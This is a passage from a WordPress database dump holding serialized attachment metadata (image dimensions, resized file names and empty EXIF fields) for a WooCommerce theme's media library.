"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:20:\"h3-img5-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:20:\"h3-img5-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:21:\"h3-img5-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:19:\"h3-img5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"h3-img5-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"h3-img5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1675,4268,'_wp_attachment_image_alt','o'),(1676,4269,'_wp_attached_file','2018/03/landing-portfolio-section-img-1.png'),(1677,4269,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:801;s:6:\"height\";i:432;s:4:\"file\";s:43:\"2018/03/landing-portfolio-section-img-1.png\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:43:\"landing-portfolio-section-img-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:43:\"landing-portfolio-section-img-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:43:\"landing-portfolio-section-img-1-600x324.png\";s:5:\"width\";i:600;s:6:\"height\";i:324;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:43:\"landing-portfolio-section-img-1-300x162.png\";s:5:\"width\";i:300;s:6:\"height\";i:162;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:43:\"landing-portfolio-section-img-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:43:\"landing-portfolio-section-img-1-768x414.png\";s:5:\"width\";i:768;s:6:\"height\";i:414;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:43:\"landing-portfolio-section-img-1-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:43:\"landing-portfolio-section-img-1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:43:\"landing-portfolio-section-img-1-550x432.png\";s:5:\"width\";i:550;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:43:\"landing-portfolio-section-img-1-550x432.png\";s:5:\"width\";i:550;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:43:\"landing-portfolio-section-img-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:43:\"landing-portfolio-section-img-1-600x324.png\";s:5:\"width\";i:600;s:6:\"height\";i:324;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:43:\"landing-portfolio-section-img-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1678,2483,'_wp_attachment_image_alt','a'),(1679,2484,'_wp_attached_file','2018/01/product16-gallery1.jpg'),(1680,2484,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:30:\"2018/01/product16-gallery1.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"product16-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"product16-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"product16-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"product16-gallery1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"product16-gallery1-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"product16-gallery1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"product16-gallery1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"product16-gallery1-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"product16-gallery1-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"product16-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"product16-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1681,2484,'_wp_attachment_image_alt','a'),(1682,1078,'_wp_attachment_image_alt',''),(1683,2485,'_wp_attached_file','2018/01/product16-gallery2.jpg'),(1684,2485,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:30:\"2018/01/product16-gallery2.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"product16-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"product16-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"product16-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"product16-gallery2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"product16-gallery2-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"product16-gallery2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"product16-gallery2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"product16-gallery2-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"product16-gallery2-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"product16-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"product16-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1685,2485,'_wp_attachment_image_alt','a'),(1686,4269,'_wp_attachment_image_alt','a'),(1687,2486,'_wp_attached_file','2018/01/product16-gallery3.jpg'),(1688,2486,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:30:\"2018/01/product16-gallery3.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"product16-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"product16-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"product16-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"product16-gallery3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"product16-gallery3-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"product16-gallery3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"product16-gallery3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"product16-gallery3-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"product16-gallery3-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"product16-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"product16-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1689,4270,'_wp_attached_file','2018/03/landing-cinnamon-slider-2.png'),(1690,4270,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:734;s:6:\"height\";i:843;s:4:\"file\";s:37:\"2018/03/landing-cinnamon-slider-2.png\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"landing-cinnamon-slider-2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"landing-cinnamon-slider-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:37:\"landing-cinnamon-slider-2-600x689.png\";s:5:\"width\";i:600;s:6:\"height\";i:689;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"landing-cinnamon-slider-2-261x300.png\";s:5:\"width\";i:261;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"landing-cinnamon-slider-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:37:\"landing-cinnamon-slider-2-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:37:\"landing-cinnamon-slider-2-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:37:\"landing-cinnamon-slider-2-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:37:\"landing-cinnamon-slider-2-734x550.png\";s:5:\"width\";i:734;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:37:\"landing-cinnamon-slider-2-550x843.png\";s:5:\"width\";i:550;s:6:\"height\";i:843;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:37:\"landing-cinnamon-slider-2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:37:\"landing-cinnamon-slider-2-600x689.png\";s:5:\"width\";i:600;s:6:\"height\";i:689;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"landing-cinnamon-slider-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1691,592,'_wp_attachment_image_alt','a'),(1692,593,'_wp_attached_file','2018/01/h10-slide1-graphic2.png'),(1693,593,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:491;s:6:\"height\";i:427;s:4:\"file\";s:31:\"2018/01/h10-slide1-graphic2.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h10-slide1-graphic2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h10-slide1-graphic2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h10-slide1-graphic2-300x261.png\";s:5:\"width\";i:300;s:6:\"height\";i:261;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h10-slide1-graphic2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"h10-slide1-graphic2-491x300.png\";s:5:\"width\";i:491;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"h10-slide1-graphic2-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"h10-slide1-graphic2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h10-slide1-graphic2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1694,2486,'_wp_attachment_image_alt',''),(1695,2508,'_wp_attached_file','2018/02/h2-img-1.jpg'),(1696,2508,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:215;s:6:\"height\";i:202;s:4:\"file\";s:20:\"2018/02/h2-img-1.jpg\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h2-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h2-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h2-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1697,2508,'_wp_attachment_image_alt','o'),(1698,593,'_wp_attachment_image_alt','o'),(1699,2509,'_wp_attached_file','2018/02/h2-img-2.jpg'),(1700,2509,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:215;s:6:\"height\";i:202;s:4:\"file\";s:20:\"2018/02/h2-img-2.jpg\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h2-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h2-img-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h2-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1701,2509,'_wp_attachment_image_alt','o'),(1702,610,'_wp_attached_file','2018/01/h10-slide2-graphic1.jpg'),(1703,610,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1097;s:4:\"file\";s:31:\"2018/01/h10-slide2-graphic1.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h10-slide2-graphic1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h10-slide2-graphic1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"h10-slide2-graphic1-600x343.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:343;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h10-slide2-graphic1-300x171.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"h10-slide2-graphic1-1024x585.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:585;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h10-slide2-graphic1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"h10-slide2-graphic1-768x439.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:439;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"h10-slide2-graphic1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"h10-slide2-graphic1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"h10-slide2-graphic1-1536x878.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:878;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"h10-slide2-graphic1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:32:\"h10-slide2-graphic1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:32:\"h10-slide2-graphic1-550x1097.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1097;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:33:\"h10-slide2-graphic1-1100x1097.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1097;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"h10-slide2-graphic1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"h10-slide2-graphic1-600x343.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:343;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h10-slide2-graphic1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1704,2510,'_wp_attached_file','2018/02/h2-img-3.jpg'),(1705,2510,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:215;s:6:\"height\";i:202;s:4:\"file\";s:20:\"2018/02/h2-img-3.jpg\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h2-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h2-img-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h2-img-3-